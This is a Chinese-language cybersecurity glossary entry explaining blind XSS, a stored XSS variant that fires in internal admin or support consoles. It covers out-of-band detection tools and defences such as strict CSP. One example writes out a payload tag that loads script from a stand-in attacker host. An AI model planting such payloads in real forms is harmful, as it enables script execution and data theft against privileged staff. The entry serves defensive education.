Skip to content
Vol. 1 · Ed. 2026
CyberGlossary
Entry № 122

盲打 XSS

审核人Cybersecurity entrepreneur & security researcher

盲打 XSS 是什么?

盲打 XSS存储型 XSS 的一种,载荷在攻击者无法直接观察到的环境中触发,通常是内部管理后台或工作台。


盲打 XSS 是存储型 XSS 的子类,恶意脚本并不在攻击者自己的浏览器中执行,而是在另一个通常具有更高权限的环境中触发,例如客服工单页、风控审核控制台、内部仪表板或备份报告。攻击者通过公共表单(联系表单、注册、工单)提交载荷,然后等待内部用户查看已保存的数据。检测依赖带外回调:载荷会将数据外发到 XSS Hunter、Burp Collaborator 或自建 DNS/HTTP 服务器,从而暴露脚本运行的位置。防御方式与存储型 XSS 相同,并应在管理工具上启用严格的 CSP。

示例

  1. 01

    工单表单字段包含 <script src=https://x.attacker/x.js></script>,在客服 CRM 中触发。

  2. 02

    User-Agent 头被记录在管理日志查看器中,未对 HTML 进行编码而执行。

常见问题

盲打 XSS 是什么?

存储型 XSS 的一种,载荷在攻击者无法直接观察到的环境中触发,通常是内部管理后台或工作台。 它属于网络安全的 攻击与威胁 分类。

盲打 XSS 是什么意思?

存储型 XSS 的一种,载荷在攻击者无法直接观察到的环境中触发,通常是内部管理后台或工作台。

如何防御 盲打 XSS?

针对 盲打 XSS 的防御通常结合技术控制与运营实践,详见上方完整定义。

盲打 XSS 还有哪些其他名称?

常见的别称包括: 带外 XSS。

相关术语